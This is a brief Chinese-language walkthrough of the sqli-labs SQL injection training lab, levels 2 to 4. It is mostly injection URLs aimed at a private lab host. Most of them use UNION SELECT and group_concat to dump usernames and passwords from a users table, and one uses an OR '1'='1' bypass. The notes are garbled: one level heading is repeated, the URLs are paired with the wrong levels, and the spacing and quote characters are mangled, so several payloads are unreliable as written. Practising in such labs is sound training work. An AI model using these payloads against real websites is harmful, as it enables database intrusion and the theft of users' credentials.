sqllab less 2- less 4
less 2 跟less 1区别: 去掉单引号查询表的用户名与密码
http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,‘:‘,password) from security.users --+
less 3 跟less 1 区别: 加上)将SQL 语句闭合
http://10.9.2.81/Less-3/?id=1 ‘)or ‘1‘=‘1‘ --+
less 3 跟less 1 区别: 加上)将SQL 语句闭合
http://10.9.2.81/Less-4/?id=-1%22)%20union%20select%201,2,group_concat(username,%27:%27,password)%20from%20security.users%20--+
less 4 跟less 3 区别 ‘ 变成 ”
http://10.9.2.81/Less-3/?id=-1’)union select2,3,group_concat(username,‘:‘,password) from security.users--+